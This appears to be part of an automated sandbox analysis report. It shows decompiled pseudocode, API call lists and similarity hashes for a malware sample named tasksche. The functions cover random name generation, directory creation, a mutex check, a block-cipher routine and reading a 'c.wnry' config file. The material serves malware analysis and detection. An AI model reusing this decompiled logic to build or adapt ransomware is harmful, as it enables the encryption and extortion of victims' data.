					} while (_v8 < wcslen( &_v412));
				}
				srand(_t54);
				_t42 = rand();
				_t71 = 0;
				asm("cdq");
				_t60 = 8;
				_t76 = _t42 % _t60 + _t60;
				if(_t76 > 0) {
					do {
						_t48 = rand();
						asm("cdq");
						_t62 = 0x1a;
						 *((char*)(_t71 + _a4)) = _t48 % _t62 + 0x61;
						_t71 = _t71 + 1;
					} while (_t71 < _t76);
				}
				_t77 = _t76 + 3;
				while(_t71 < _t77) {
					_t45 = rand();
					asm("cdq");
					_t61 = 0xa;
					 *((char*)(_t71 + _a4)) = _t45 % _t61 + 0x30;
					_t71 = _t71 + 1;
				}
				_t44 = _a4;
				 *(_t71 + _t44) =  *(_t71 + _t44) & 0x00000000;
				return _t44;
			}





















                    0x0040122e
                    0x00401239
                    0x00401240
                    0x00401249
                    0x00401250
                    0x00401252
                    0x0040125f
                    0x0040126b
                    0x00401277
                    0x0040127e
                    0x00401280
                    0x00401286
                    0x00401289
                    0x0040128c
                    0x00401297
                    0x0040129d
                    0x00401286
                    0x004012a1
                    0x004012ae
                    0x004012b2
                    0x004012b4
                    0x004012b5
                    0x004012ba
                    0x004012be
                    0x004012c0
                    0x004012c0
                    0x004012c4
                    0x004012c5
                    0x004012ce
                    0x004012d1
                    0x004012d2
                    0x004012c0
                    0x004012d6
                    0x004012d9
                    0x004012dd
                    0x004012e1
                    0x004012e2
                    0x004012eb
                    0x004012ee
                    0x004012ee
                    0x004012f1
                    0x004012f4
                    0x004012fc

                    APIs
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: rand$wcslen$ComputerNamesrand
                    • String ID:
                    • API String ID: 3058258771-0
                    • Opcode ID: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
                    • Instruction ID: 153b78e0bdef4b648922335b0398b7079fc1e42e5dbb3c53d325bf346215f47a
                    • Opcode Fuzzy Hash: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
                    • Instruction Fuzzy Hash: FA212833A00318ABD7119B65ED81BDD77A8EB45354F1100BBF948F71C0CA759EC28BA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00407070 Relevance: 10.6, APIs: 7, Instructions: 74stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00407070(char* _a4, char* _a8) {
				char _v264;
				void _v524;
				long _t16;
				char* _t30;
				char* _t31;
				char* _t36;
				char* _t38;
				int _t40;
				void* _t41;

				_t30 = _a4;
				if(_t30 != 0 && GetFileAttributesA(_t30) == 0xffffffff) {
					CreateDirectoryA(_t30, 0);
				}
				_t36 = _a8;
				_t16 =  *_t36;
				if(_t16 != 0) {
					_t38 = _t36;
					_t31 = _t36;
					do {
						if(_t16 == 0x2f || _t16 == 0x5c) {
							_t38 = _t31;
						}
						_t16 = _t31[1];
						_t31 =  &(_t31[1]);
					} while (_t16 != 0);
					if(_t38 != _t36) {
						_t40 = _t38 - _t36;
						memcpy( &_v524, _t36, _t40);
						 *(_t41 + _t40 - 0x208) =  *(_t41 + _t40 - 0x208) & 0x00000000;
						E00407070(_t30,  &_v524);
					}
					_v264 = _v264 & 0x00000000;
					if(_t30 != 0) {
						strcpy( &_v264, _t30);
					}
					strcat( &_v264, _t36);
					_t16 = GetFileAttributesA( &_v264);
					if(_t16 == 0xffffffff) {
						return CreateDirectoryA( &_v264, 0);
					}
				}
				return _t16;
			}












                    0x0040707a
                    0x00407080
                    0x00407091
                    0x00407091
                    0x00407097
                    0x0040709a
                    0x0040709e
                    0x004070a5
                    0x004070a7
                    0x004070a9
                    0x004070ab
                    0x004070b1
                    0x004070b1
                    0x004070b3
                    0x004070b6
                    0x004070b7
                    0x004070bd
                    0x004070bf
                    0x004070ca
                    0x004070cf
                    0x004070df
                    0x004070e4
                    0x004070e7
                    0x004070f1
                    0x004070fb
                    0x00407101
                    0x0040710a
                    0x00407118
                    0x00407121
                    0x00000000
                    0x0040712c
                    0x00407121
                    0x00407135

                    APIs
                    • GetFileAttributesA.KERNEL32(?,?,?), ref: 00407083
                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 00407091
                    • memcpy.MSVCRT(?,0000002F,0000002F,?,?,?), ref: 004070CA
                    • strcpy.MSVCRT(00000000,?,?,?), ref: 004070FB
                    • strcat.MSVCRT(00000000,0000002F,?,?), ref: 0040710A
                    • GetFileAttributesA.KERNEL32(00000000,?,?), ref: 00407118
                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040712C
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesCreateDirectoryFile$memcpystrcatstrcpy
                    • String ID:
                    • API String ID: 2935503933-0
                    • Opcode ID: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
                    • Instruction ID: 50ba023859918e707bf45bf33fbe73a6a33da9a39eec2eddc6b78618a8cc3524
                    • Opcode Fuzzy Hash: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
                    • Instruction Fuzzy Hash: 1A112B72C0821456CB305B749D88FD7776C9B11320F1403BBE595B32C2DA78BD898669
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401EFF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35sleepCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00401EFF(intOrPtr _a4) {
				char _v104;
				void* _t9;
				void* _t11;
				void* _t12;

				sprintf( &_v104, "%s%d", "Global\\MsWinZonesCacheCounterMutexA", 0);
				_t12 = 0;
				if(_a4 <= 0) {
					L3:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t9 = OpenMutexA(0x100000, 1,  &_v104);
					if(_t9 != 0) {
						break;
					}
					Sleep(0x3e8);
					_t12 = _t12 + 1;
					if(_t12 < _a4) {
						continue;
					}
					goto L3;
				}
				CloseHandle(_t9);
				_t11 = 1;
				return _t11;
			}







                    0x00401f16
                    0x00401f1c
                    0x00401f24
                    0x00401f4c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00401f26
                    0x00401f26
                    0x00401f31
                    0x00401f39
                    0x00000000
                    0x00000000
                    0x00401f40
                    0x00401f46
                    0x00401f4a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00401f4a
                    0x00401f52
                    0x00401f5a
                    0x00000000

                    APIs
                    • sprintf.MSVCRT(?,%s%d,Global\MsWinZonesCacheCounterMutexA,00000000), ref: 00401F16
                    • OpenMutexA.KERNEL32(00100000,00000001,?), ref: 00401F31
                    • Sleep.KERNEL32(000003E8), ref: 00401F40
                    • CloseHandle.KERNEL32(00000000), ref: 00401F52
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandleMutexOpenSleepsprintf
                    • String ID: %s%d$Global\MsWinZonesCacheCounterMutexA
                    • API String ID: 2780352083-2959021817
                    • Opcode ID: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
                    • Instruction ID: f4a3b48a0bafa41ae68b0177be176e29d76f271436d11399ade0a1af8f7a19ee
                    • Opcode Fuzzy Hash: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
                    • Instruction Fuzzy Hash: 92F0E931A40305BBDB20EBA49E4AB9B7758AB04B40F104036F945FA0D2DBB8D54586D8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403A77 Relevance: 9.1, APIs: 6, Instructions: 123COMMON
                    Download Yara Rule
                    C-Code - Quality: 59%
                    			E00403A77(void* __ecx, void* _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				void* _v12;
				char _v16;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v48;
				signed int _t121;
				int _t124;
				intOrPtr* _t126;
				intOrPtr _t127;
				int _t131;
				intOrPtr* _t133;
				intOrPtr _t135;
				intOrPtr _t137;
				signed int _t139;
				signed int _t140;
				signed int _t143;
				signed int _t150;
				intOrPtr _t160;
				int _t161;
				int _t163;
				signed int _t164;
				signed int _t165;
				intOrPtr _t168;
				void* _t169;
				signed int _t170;
				signed int _t172;
				signed int _t175;
				signed int _t178;
				intOrPtr _t194;
				void* _t195;
				void* _t196;
				void* _t197;
				intOrPtr _t198;
				void* _t201;

				_t197 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v16);
					L0040776E();
				}
				_t121 = _a12;
				if(_t121 == 0) {
					L15:
					__imp__??0exception@@QAE@ABQBD@Z(0x40f574);
					_push(0x40d570);
					_push( &_v16);
					L0040776E();
					_push( &_v16);
					_push(0);
					_push(_t197);
					_t198 = _v36;
					_t194 = _v32;
					_t168 =  *((intOrPtr*)(_t198 + 0x30));
					_t160 =  *((intOrPtr*)(_t198 + 0x34));
					_t71 = _t194 + 0xc; // 0x40d568
					_v48 =  *_t71;
					_v32 = _t168;
					if(_t168 > _t160) {
						_t160 =  *((intOrPtr*)(_t198 + 0x2c));
					}
					_t75 = _t194 + 0x10; // 0x19930520
					_t124 =  *_t75;
					_t161 = _t160 - _t168;
					if(_t161 > _t124) {
						_t161 = _t124;
					}
					if(_t161 != 0 && _a8 == 0xfffffffb) {
						_a8 = _a8 & 0x00000000;
					}
					 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t161;
					 *(_t194 + 0x10) = _t124 - _t161;
					_t126 =  *((intOrPtr*)(_t198 + 0x38));
					if(_t126 != 0) {
						_t137 =  *_t126( *((intOrPtr*)(_t198 + 0x3c)), _t168, _t161);
						 *((intOrPtr*)(_t198 + 0x3c)) = _t137;
						_t201 = _t201 + 0xc;
						 *((intOrPtr*)(_t194 + 0x30)) = _t137;
					}
					if(_t161 != 0) {
						memcpy(_v12, _a4, _t161);
						_v12 = _v12 + _t161;
						_t201 = _t201 + 0xc;
						_a4 = _a4 + _t161;
					}
					_t127 =  *((intOrPtr*)(_t198 + 0x2c));
					if(_a4 == _t127) {
						_t169 =  *((intOrPtr*)(_t198 + 0x28));
						_a4 = _t169;
						if( *((intOrPtr*)(_t198 + 0x34)) == _t127) {
							 *((intOrPtr*)(_t198 + 0x34)) = _t169;
						}
						_t99 = _t194 + 0x10; // 0x19930520
						_t131 =  *_t99;
						_t163 =  *((intOrPtr*)(_t198 + 0x34)) - _t169;
						if(_t163 > _t131) {
							_t163 = _t131;
						}
						if(_t163 != 0 && _a8 == 0xfffffffb) {
							_a8 = _a8 & 0x00000000;
						}
						 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t163;
						 *(_t194 + 0x10) = _t131 - _t163;
						_t133 =  *((intOrPtr*)(_t198 + 0x38));
						if(_t133 != 0) {
							_t135 =  *_t133( *((intOrPtr*)(_t198 + 0x3c)), _t169, _t163);
							 *((intOrPtr*)(_t198 + 0x3c)) = _t135;
							_t201 = _t201 + 0xc;
							 *((intOrPtr*)(_t194 + 0x30)) = _t135;
						}
						if(_t163 != 0) {
							memcpy(_v12, _a4, _t163);
							_v12 = _v12 + _t163;
							_a4 = _a4 + _t163;
						}
					}
					 *(_t194 + 0xc) = _v12;
					 *((intOrPtr*)(_t198 + 0x30)) = _a4;
					return _a8;
				} else {
					_t170 =  *(_t197 + 0x3cc);
					if(_t121 % _t170 != 0) {
						goto L15;
					} else {
						if(_a16 != 1) {
							_t195 = _a4;
							_t139 = _a12;
							_a16 = 0;
							_t164 = _a8;
							if(_a16 != 2) {
								_t140 = _t139 / _t170;
								if(_t140 > 0) {
									do {
										E00403797(_t197, _t195, _t164);
										_t172 =  *(_t197 + 0x3cc);
										_t195 = _t195 + _t172;
										_t143 = _a12 / _t172;
										_t164 = _t164 + _t172;
										_a16 = _a16 + 1;
									} while (_a16 < _t143);
									return _t143;
								}
							} else {
								_t140 = _t139 / _t170;
								if(_t140 > 0) {
									do {
										E0040350F(_t197, _t197 + 0x3f0, _t164);
										E00403A28(_t197, _t164, _t195);
										memcpy(_t197 + 0x3f0, _t195,  *(_t197 + 0x3cc));
										_t175 =  *(_t197 + 0x3cc);
										_t201 = _t201 + 0xc;
										_t150 = _a12 / _t175;
										_t195 = _t195 + _t175;
										_t164 = _t164 + _t175;
										_a16 = _a16 + 1;
									} while (_a16 < _t150);
									return _t150;
								}
							}
						} else {
							_t196 = _a4;
							_t140 = _a12 / _t170;
							_a16 = 0;
							_t165 = _a8;
							if(_t140 > 0) {
								do {
									E00403797(_t197, _t196, _t165);
									E00403A28(_t197, _t165, _t197 + 0x3f0);
									memcpy(_t197 + 0x3f0, _t196,  *(_t197 + 0x3cc));
									_t178 =  *(_t197 + 0x3cc);
									_t201 = _t201 + 0xc;
									_t140 = _a12 / _t178;
									_t196 = _t196 + _t178;
									_t165 = _t165 + _t178;
									_a16 = _a16 + 1;
								} while (_a16 < _t140);
							}
						}
						return _t140;
					}
				}
			}





































                    0x00403a7f
                    0x00403a87
                    0x00403a91
                    0x00403a9a
                    0x00403a9f
                    0x00403aa0
                    0x00403aa0
                    0x00403aa5
                    0x00403aaa
                    0x00403bba
                    0x00403bc2
                    0x00403bcb
                    0x00403bd0
                    0x00403bd1
                    0x00403bd9
                    0x00403bda
                    0x00403bdb
                    0x00403bdc
                    0x00403be0
                    0x00403be3
                    0x00403be6
                    0x00403be9
                    0x00403bee
                    0x00403bf1
                    0x00403bf4
                    0x00403bf6
                    0x00403bf6
                    0x00403bf9
                    0x00403bf9
                    0x00403bfc
                    0x00403c00
                    0x00403c02
                    0x00403c02
                    0x00403c06
                    0x00403c0e
                    0x00403c0e
                    0x00403c12
                    0x00403c17
                    0x00403c1a
                    0x00403c1f
                    0x00403c26
                    0x00403c28
                    0x00403c2b
                    0x00403c2e
                    0x00403c2e
                    0x00403c33
                    0x00403c3c
                    0x00403c41
                    0x00403c44
                    0x00403c47
                    0x00403c47
                    0x00403c4a
                    0x00403c50
                    0x00403c52
                    0x00403c58
                    0x00403c5b
                    0x00403c5d
                    0x00403c5d
                    0x00403c63
                    0x00403c63
                    0x00403c66
                    0x00403c6a
                    0x00403c6c
                    0x00403c6c
                    0x00403c70
                    0x00403c78
                    0x00403c78
                    0x00403c7c
                    0x00403c81
                    0x00403c84
                    0x00403c89
                    0x00403c90
                    0x00403c92
                    0x00403c95
                    0x00403c98
                    0x00403c98
                    0x00403c9d
                    0x00403ca6
                    0x00403cab
                    0x00403cb1
                    0x00403cb1
                    0x00403c9d
                    0x00403cb7
                    0x00403cbd
                    0x00403cc7
                    0x00403ab0
                    0x00403ab0
                    0x00403abc
                    0x00000000
                    0x00403ac2
                    0x00403ac6
                    0x00403b2c
                    0x00403b2f
                    0x00403b32
                    0x00403b35
                    0x00403b38
                    0x00403b8d
                    0x00403b91
                    0x00403b93
                    0x00403b97
                    0x00403b9c
                    0x00403ba7
                    0x00403ba9
                    0x00403bab
                    0x00403bad
                    0x00403bb0
                    0x00000000
                    0x00403b93
                    0x00403b3a
                    0x00403b3c
                    0x00403b40
                    0x00403b42
                    0x00403b4c
                    0x00403b55
                    0x00403b68
                    0x00403b6d
                    0x00403b78
                    0x00403b7b
                    0x00403b7d
                    0x00403b7f
                    0x00403b81
                    0x00403b84
                    0x00000000
                    0x00403b42
                    0x00403b40
                    0x00403ac8
                    0x00403acb
                    0x00403ace
                    0x00403ad0
                    0x00403ad3
                    0x00403ad8
                    0x00403ada
                    0x00403ade
                    0x00403aed
                    0x00403b00
                    0x00403b05
                    0x00403b10
                    0x00403b13
                    0x00403b15
                    0x00403b17
                    0x00403b19
                    0x00403b1c
                    0x00403ada
                    0x00403ad8
                    0x00403b25
                    0x00403b25
                    0x00403abc

                    APIs
                    • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,00000001), ref: 00403A91
                    • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403AA0
                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B00
                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B68
                    • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F574,?,?,?,?,?,00000001), ref: 00403BC2
                    • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403BD1
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: ??0exception@@ExceptionThrowmemcpy
                    • String ID:
                    • API String ID: 2382887404-0
                    • Opcode ID: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
                    • Instruction ID: 9805a50700f74263afb1320d00d27f30e93ca80038ec105a2d2f515762341bf2
                    • Opcode Fuzzy Hash: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
                    • Instruction Fuzzy Hash: 8541C870B40206ABDB14DE65DD81D9B77BEEB84309B00443FF815B3281D778AB15C759
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38fileCOMMON
                    Download Yara Rule
                    APIs
                    • fopen.MSVCRT(c.wnry,0040E018), ref: 0040101B
                    • fread.MSVCRT(?,0000030C,00000001,00000000), ref: 0040103F
                    • fwrite.MSVCRT(?,0000030C,00000001,00000000), ref: 00401047
                    • fclose.MSVCRT(00000000), ref: 00401058
                    Strings
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: fclosefopenfreadfwrite
                    • String ID: c.wnry
                    • API String ID: 4000964834-3240288721
                    • Opcode ID: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
                    • Instruction ID: 4fc4ee2583eead98f325da0eb4a8e2a7a7827d82b7f69226d67b1691b23a23d5
                    • Opcode Fuzzy Hash: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
                    • Instruction Fuzzy Hash: 0CF05931204260ABCA301F656D4AA277B10DBC4F61F10083FF1C1F40E2CABD44C296BE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004018F9 Relevance: 7.6, APIs: 5, Instructions: 79filememoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 24%
                    			E004018F9(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				struct _OVERLAPPED* _v8;
				char _v20;
				long _v32;
				struct _OVERLAPPED* _v36;
				long _v40;
				signed int _v44;
				void* _t18;
				void* _t28;
				long _t34;
				intOrPtr _t38;

				_push(0xffffffff);
				_push(0x4081f0);
				_push(0x4076f4);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t38;
				_v44 = _v44 | 0xffffffff;
				_v32 = 0;
				_v36 = 0;
				_v8 = 0;
				_t18 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
				_v44 = _t18;
				if(_t18 != 0xffffffff) {
					_t34 = GetFileSize(_t18, 0);
					_v40 = _t34;
					if(_t34 != 0xffffffff && _t34 <= 0x19000) {
						_t28 = GlobalAlloc(0, _t34);
						_v36 = _t28;
						if(_t28 != 0 && ReadFile(_v44, _t28, _t34,  &_v32, 0) != 0) {
							_push(_a8);
							_push(0);
							_push(0);
							_push(_v32);
							_push(_t28);
							_push(_a4);
							if( *0x40f898() != 0) {
								_push(1);
								_pop(0);
							}
						}
					}
				}
				_push(0xffffffff);
				_push( &_v20);
				L004076FA();
				 *[fs:0x0] = _v20;
				return 0;
			}













                    0x004018fc
                    0x004018fe
                    0x00401903
                    0x0040190e
                    0x0040190f
                    0x0040191c
                    0x00401922
                    0x00401925
                    0x00401928
                    0x0040193a
                    0x00401940
                    0x00401946
                    0x00401950
                    0x00401952
                    0x00401958
                    0x0040196a
                    0x0040196c
                    0x00401971
                    0x00401987
                    0x0040198a
                    0x0040198b
                    0x0040198c
                    0x0040198f
                    0x00401990
                    0x0040199b
                    0x0040199d
                    0x0040199f
                    0x0040199f
                    0x0040199b
                    0x00401971
                    0x00401958
                    0x004019a0
                    0x004019a5
                    0x004019a6
                    0x004019d5
                    0x004019e0

                    APIs
                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040193A
                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040194A
                    • GlobalAlloc.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 00401964
                    • ReadFile.KERNEL32(000000FF,00000000,00000000,?,00000000,?,?,?,?,?,?,00401448,?), ref: 0040197D
                    • _local_unwind2.MSVCRT(?,000000FF,?,?,?,?,?,?,00401448,?), ref: 004019A6
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$AllocCreateGlobalReadSize_local_unwind2
                    • String ID:
                    • API String ID: 2811923685-0
                    • Opcode ID: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
                    • Instruction ID: fb063a64e2dc49fc25d010f75d45645ced701e765f932c996de96a45c5b9f027
                    • Opcode Fuzzy Hash: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
                    • Instruction Fuzzy Hash: B62160B1901624AFCB209B99CD48FDF7E78EB097B0F54022AF525B22E0D7785805C6AC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405BAE Relevance: 6.1, APIs: 4, Instructions: 93fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 97%
                    			E00405BAE(CHAR* _a4, intOrPtr _a8, long _a12, void* _a16) {
				char _v5;
				char _v6;
				long _t30;
				char _t32;
				long _t34;
				void* _t46;
				intOrPtr* _t49;
				long _t50;

				_t30 = _a12;
				if(_t30 == 1 || _t30 == 2 || _t30 == 3) {
					_t49 = _a16;
					_t46 = 0;
					_v6 = 0;
					 *_t49 = 0;
					_v5 = 0;
					if(_t30 == 1) {
						_t46 = _a4;
						_v5 = 0;
						L11:
						_t30 = SetFilePointer(_t46, 0, 0, 1);
						_v6 = _t30 != 0xffffffff;
						L12:
						_push(0x20);
						L00407700();
						_t50 = _t30;
						if(_a12 == 1 || _a12 == 2) {
							 *_t50 = 1;
							 *((char*)(_t50 + 0x10)) = _v5;
							_t32 = _v6;
							 *((char*)(_t50 + 1)) = _t32;
							 *(_t50 + 4) = _t46;
							 *((char*)(_t50 + 8)) = 0;
							 *((intOrPtr*)(_t50 + 0xc)) = 0;
							if(_t32 != 0) {
								 *((intOrPtr*)(_t50 + 0xc)) = SetFilePointer(_t46, 0, 0, 1);
							}
						} else {
							 *_t50 = 0;
							 *((intOrPtr*)(_t50 + 0x14)) = _a4;
							 *((char*)(_t50 + 1)) = 1;
							 *((char*)(_t50 + 0x10)) = 0;
							 *((intOrPtr*)(_t50 + 0x18)) = _a8;
							 *((intOrPtr*)(_t50 + 0x1c)) = 0;
							 *((intOrPtr*)(_t50 + 0xc)) = 0;
						}
						 *_a16 = 0;
						_t34 = _t50;
						goto L18;
					}
					if(_t30 != 2) {
						goto L12;
					}
					_t46 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
					if(_t46 != 0xffffffff) {
						_v5 = 1;
						goto L11;
					}
					 *_t49 = 0x200;
					goto L8;
				} else {
					 *_a16 = 0x10000;
					L8:
					_t34 = 0;
					L18:
					return _t34;
				}
			}











                    0x00405bb2
                    0x00405bbb
                    0x00405bd2
                    0x00405bd7
                    0x00405bdc
                    0x00405bdf
                    0x00405be1
                    0x00405be4
                    0x00405c18
                    0x00405c1b
                    0x00405c24
                    0x00405c29
                    0x00405c32
                    0x00405c36
                    0x00405c36
                    0x00405c38
                    0x00405c42
                    0x00405c44
                    0x00405c6c
                    0x00405c6f
                    0x00405c72
                    0x00405c77
                    0x00405c7a
                    0x00405c7d
                    0x00405c80
                    0x00405c83
                    0x00405c90
                    0x00405c90
                    0x00405c4c
                    0x00405c4f
                    0x00405c51
                    0x00405c57
                    0x00405c5b
                    0x00405c5e
                    0x00405c61
                    0x00405c64
                    0x00405c64
                    0x00405c96
                    0x00405c98
                    0x00000000
                    0x00405c98
                    0x00405be9
                    0x00000000
                    0x00000000
                    0x00405c04
                    0x00405c09
                    0x00405c20
                    0x00000000
                    0x00405c20
                    0x00405c0b
                    0x00000000
                    0x00405bc7
                    0x00405bca
                    0x00405c11
                    0x00405c11
                    0x00405c9a
                    0x00405c9e
                    0x00405c9e

                    APIs
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001), ref: 00405BFE
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000), ref: 00405C29
                    • ??2@YAPAXI@Z.MSVCRT(00000020,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000,004020D5,?), ref: 00405C38
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA), ref: 00405C8A
                    Memory Dump Source
                    • Source File: 00000013.00000002.468432098.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.468334608.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468466584.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                    • Associated: 00000013.00000002.468514366.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_tasksche.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Pointer$??2@Create
                    • String ID:
                    • API String ID: 1331958074-0
